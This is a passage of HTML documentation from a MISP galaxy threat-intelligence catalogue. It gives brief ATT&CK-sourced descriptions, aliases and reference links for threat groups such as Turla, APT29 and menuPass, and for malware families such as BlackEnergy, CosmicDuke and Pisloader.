<p>Scarlet Mimic is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Scarlet Mimic</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1198. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0029">https://attack.mitre.org/wiki/Group/G0029</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/">http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_threat_group_1314"><a class="anchor" href="#_threat_group_1314"></a><a class="link" href="#_threat_group_1314">Threat Group-1314</a></h3>
<div class="paragraph">
<p>Threat Group-1314 is an unattributed threat group that has used compromised credentials to log into a victim&#8217;s remote access infrastructure.[[Citation: Dell TG-1314]]</p>
</div>
<div class="paragraph">
<p>Threat Group-1314 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Threat Group-1314</p>
</li>
<li>
<p>TG-1314</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1199. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0028">https://attack.mitre.org/wiki/Group/G0028</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/resources/blog/living-off-the-land/">http://www.secureworks.com/resources/blog/living-off-the-land/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_turla"><a class="anchor" href="#_turla"></a><a class="link" href="#_turla">Turla</a></h3>
<div class="paragraph">
<p>Turla is a threat group that has infected victims in over 45 countries, spanning a range of industries including government, embassies, military, education, research and pharmaceutical companies.[[Citation: Kaspersky Turla]]</p>
</div>
<div class="paragraph">
<p>Turla is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Turla</p>
</li>
<li>
<p>Waterbug</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1200. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0010">https://attack.mitre.org/wiki/Group/G0010</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/analysis/publications/65545/the-epic-turla-operation/">https://securelist.com/analysis/publications/65545/the-epic-turla-operation/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt29"><a class="anchor" href="#_apt29"></a><a class="link" href="#_apt29">APT29</a></h3>
<div class="paragraph">
<p>APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008.[[Citation: F-Secure The Dukes]][[Citation: GRIZZLY STEPPE JAR]] This group reportedly compromised the Democratic National Committee starting in the summer of 2015.[[Citation: Crowdstrike DNC June 2016]]</p>
</div>
<div class="paragraph">
<p>APT29 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT29</p>
</li>
<li>
<p>The Dukes</p>
</li>
<li>
<p>Cozy Bear</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1201. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0016">https://attack.mitre.org/wiki/Group/G0016</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/">https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fin10"><a class="anchor" href="#_fin10"></a><a class="link" href="#_fin10">FIN10</a></h3>
<div class="paragraph">
<p>FIN10 is a financially motivated threat group that has targeted organizations in North America since at least 2013 through 2016. The group uses stolen data exfiltrated from victims to extort organizations.[[Citation: FireEye FIN10 June 2017]]</p>
</div>
<div class="paragraph">
<p>FIN10 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>FIN10</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1202. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0051">https://attack.mitre.org/wiki/Group/G0051</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf">https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin10.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_menupass"><a class="anchor" href="#_menupass"></a><a class="link" href="#_menupass">menuPass</a></h3>
<div class="paragraph">
<p>menuPass is a threat group that appears to originate from China and has been active since approximately 2009. The group has targeted healthcare, defense, aerospace, and government sectors, and has targeted Japanese victims since at least 2014. In 2016 and 2017, the group targeted managed IT service providers, manufacturing and mining companies, and a university.[[Citation: Palo Alto menuPass Feb 2017]][[Citation: Crowdstrike CrowdCast Oct 2013]][[Citation: FireEye Poison Ivy]][[Citation: PWC Cloud Hopper April 2017]][[Citation: FireEye APT10 April 2017]]</p>
</div>
<div class="paragraph">
<p>menuPass is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>menuPass</p>
</li>
<li>
<p>Stone Panda</p>
</li>
<li>
<p>APT10</p>
</li>
<li>
<p>Red Apollo</p>
</li>
<li>
<p>CVNX</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1203. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0045">https://attack.mitre.org/wiki/Group/G0045</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html">https://www.fireeye.com/blog/threat-research/2017/04/apt10%20menupass%20grou.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf">https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem">https://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/">http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_putter_panda"><a class="anchor" href="#_putter_panda"></a><a class="link" href="#_putter_panda">Putter Panda</a></h3>
<div class="paragraph">
<p>Putter Panda is a Chinese threat group that has been attributed to Unit 61486 of the 12th Bureau of the PLAs 3rd General Staff Department (GSD).[[Citation: CrowdStrike Putter Panda]]</p>
</div>
<div class="paragraph">
<p>Putter Panda is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Putter Panda</p>
</li>
<li>
<p>APT2</p>
</li>
<li>
<p>MSUpdater</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1204. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0024">https://attack.mitre.org/wiki/Group/G0024</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf">http://cdn0.vox-cdn.com/assets/4589853/crowdstrike-intelligence-report-putter-panda.original.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_axiom"><a class="anchor" href="#_axiom"></a><a class="link" href="#_axiom">Axiom</a></h3>
<div class="paragraph">
<p>Axiom is a cyber espionage group suspected to be associated with the Chinese government.Winnti Group use the malware Winnti, the two groups appear to be distinct based on differences in reporting on the groups' TTPs and targeting.[[Citation: Kaspersky Winnti April 2013]][[Citation: Kaspersky Winnti June 2015]][[Citation: Novetta Winnti April 2015]]</p>
</div>
<div class="paragraph">
<p>Axiom is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Axiom</p>
</li>
<li>
<p>Group 72</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1205. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0001">https://attack.mitre.org/wiki/Group/G0001</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf">https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/winnti-more-than-just-a-game-130410.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/incidents/70991/games-are-over/">https://securelist.com/blog/incidents/70991/games-are-over/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf">http://www.novetta.com/wp-content/uploads/2014/11/Executive%20Summary-Final%201.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf">http://www.novetta.com/wp-content/uploads/2015/04/novetta%20winntianalysis.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_carbanak"><a class="anchor" href="#_carbanak"></a><a class="link" href="#_carbanak">Carbanak</a></h3>
<div class="paragraph">
<p>Carbanak is a threat group that mainly targets banks. It also refers to malware of the same name (Carbanak).[[Citation: Kaspersky Carbanak]]</p>
</div>
<div class="paragraph">
<p>Carbanak is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Carbanak</p>
</li>
<li>
<p>Anunak</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1206. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0008">https://attack.mitre.org/wiki/Group/G0008</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/02/Carbanak%20APT%20eng.pdf">https://securelist.com/files/2015/02/Carbanak%20APT%20eng.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt18"><a class="anchor" href="#_apt18"></a><a class="link" href="#_apt18">APT18</a></h3>
<div class="paragraph">
<p>APT18 is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical.[[Citation: Dell Lateral Movement]]</p>
</div>
<div class="paragraph">
<p>APT18 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT18</p>
</li>
<li>
<p>TG-0416</p>
</li>
<li>
<p>Dynamite Panda</p>
</li>
<li>
<p>Threat Group-0416</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1207. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0026">https://attack.mitre.org/wiki/Group/G0026</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/">http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt32"><a class="anchor" href="#_apt32"></a><a class="link" href="#_apt32">APT32</a></h3>
<div class="paragraph">
<p>APT32 is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists. The group&#8217;s operations are aligned with Vietnamese state interests.[[Citation: FireEye APT32 May 2017]]</p>
</div>
<div class="paragraph">
<p>APT32 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT32</p>
</li>
<li>
<p>OceanLotus Group</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1208. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0050">https://attack.mitre.org/wiki/Group/G0050</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gamaredon_group"><a class="anchor" href="#_gamaredon_group"></a><a class="link" href="#_gamaredon_group">Gamaredon Group</a></h3>
<div class="paragraph">
<p>Gamaredon Group is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government.[[Citation: Palo Alto Gamaredon Feb 2017]]</p>
</div>
<div class="paragraph">
<p>Gamaredon Group is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Gamaredon Group</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1209. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0047">https://attack.mitre.org/wiki/Group/G0047</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/">https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_malware"><a class="anchor" href="#_malware"></a><a class="link" href="#_malware">Malware</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Name of ATT&amp;CK software.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Malware is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/malware.json"><strong>this location</strong></a> The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_oldbait"><a class="anchor" href="#_oldbait"></a><a class="link" href="#_oldbait">OLDBAIT</a></h3>
<div class="paragraph">
<p>OLDBAIT is a credential harvester used by APT28.[[Citation: FireEye APT28]][[Citation: FireEye APT28 January 2017]]</p>
</div>
<div class="paragraph">
<p>Aliases: OLDBAIT, Sasfis</p>
</div>
<div class="paragraph">
<p>OLDBAIT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OLDBAIT</p>
</li>
<li>
<p>Sasfis</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1210. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0138">https://attack.mitre.org/wiki/Software/S0138</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf">https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_soundbite"><a class="anchor" href="#_soundbite"></a><a class="link" href="#_soundbite">SOUNDBITE</a></h3>
<div class="paragraph">
<p>SOUNDBITE is a signature backdoor used by APT32.[[Citation: FireEye APT32 May 2017]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1211. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0157">https://attack.mitre.org/wiki/Software/S0157</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cosmicduke"><a class="anchor" href="#_cosmicduke"></a><a class="link" href="#_cosmicduke">CosmicDuke</a></h3>
<div class="paragraph">
<p>CosmicDuke is malware that was used by APT29 from 2010 to 2015.[[Citation: F-Secure The Dukes]]</p>
</div>
<div class="paragraph">
<p>Aliases: CosmicDuke, TinyBaron, BotgenStudios, NemesisGemina</p>
</div>
<div class="paragraph">
<p>CosmicDuke is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CosmicDuke</p>
</li>
<li>
<p>TinyBaron</p>
</li>
<li>
<p>BotgenStudios</p>
</li>
<li>
<p>NemesisGemina</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1212. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0050">https://attack.mitre.org/wiki/Software/S0050</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_h1n1"><a class="anchor" href="#_h1n1"></a><a class="link" href="#_h1n1">H1N1</a></h3>
<div class="paragraph">
<p>H1N1 is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality.[[Citation: Cisco H1N1 Part 1]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1213. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0132">https://attack.mitre.org/wiki/Software/S0132</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities">http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spaceship"><a class="anchor" href="#_spaceship"></a><a class="link" href="#_spaceship">SPACESHIP</a></h3>
<div class="paragraph">
<p>SPACESHIP is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.[[Citation: FireEye APT30]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1214. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0035">https://attack.mitre.org/wiki/Software/S0035</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hi_zor"><a class="anchor" href="#_hi_zor"></a><a class="link" href="#_hi_zor">Hi-Zor</a></h3>
<div class="paragraph">
<p>Hi-Zor is a remote access tool (RAT) that has characteristics similar to Sakula. It was used in a campaign named INOCNATION.[[Citation: Fidelis Hi-Zor]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1215. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0087">https://attack.mitre.org/wiki/Software/S0087</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html">http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_textmate"><a class="anchor" href="#_textmate"></a><a class="link" href="#_textmate">TEXTMATE</a></h3>
<div class="paragraph">
<p>TEXTMATE is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with POWERSOURCE in February 2017.[[Citation: FireEye FIN7 March 2017]]</p>
</div>
<div class="paragraph">
<p>Aliases: TEXTMATE, DNSMessenger</p>
</div>
<div class="paragraph">
<p>TEXTMATE is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>TEXTMATE</p>
</li>
<li>
<p>DNSMessenger</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1216. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0146">https://attack.mitre.org/wiki/Software/S0146</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html">https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_net_crawler"><a class="anchor" href="#_net_crawler"></a><a class="link" href="#_net_crawler">Net Crawler</a></h3>
<div class="paragraph">
<p>Net Crawler is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using PsExec to execute a copy of Net Crawler.[[Citation: Cylance Cleaver]]</p>
</div>
<div class="paragraph">
<p>Aliases: Net Crawler, NetC</p>
</div>
<div class="paragraph">
<p>Net Crawler is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Net Crawler</p>
</li>
<li>
<p>NetC</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1217. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0056">https://attack.mitre.org/wiki/Software/S0056</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.cylance.com/assets/Cleaver/Cylance%20Operation%20Cleaver%20Report.pdf">http://www.cylance.com/assets/Cleaver/Cylance%20Operation%20Cleaver%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blackenergy"><a class="anchor" href="#_blackenergy"></a><a class="link" href="#_blackenergy">BlackEnergy</a></h3>
<div class="paragraph">
<p>BlackEnergy is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3.[[Citation: F-Secure BlackEnergy 2014]]</p>
</div>
<div class="paragraph">
<p>Aliases: BlackEnergy, Black Energy</p>
</div>
<div class="paragraph">
<p>BlackEnergy is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BlackEnergy</p>
</li>
<li>
<p>Black Energy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1218. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0089">https://attack.mitre.org/wiki/Software/S0089</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/blackenergy%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/blackenergy%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pisloader"><a class="anchor" href="#_pisloader"></a><a class="link" href="#_pisloader">Pisloader</a></h3>
<div class="paragraph">
<p>Pisloader is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by APT18 and is similar to another malware family, HTTPBrowser, that has been used by the group.[[Citation: Palo Alto DNS Requests]]</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1219. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0124">https://attack.mitre.org/wiki/Software/S0124</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/">http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/</a></p></td>
</tr>
</tbody>
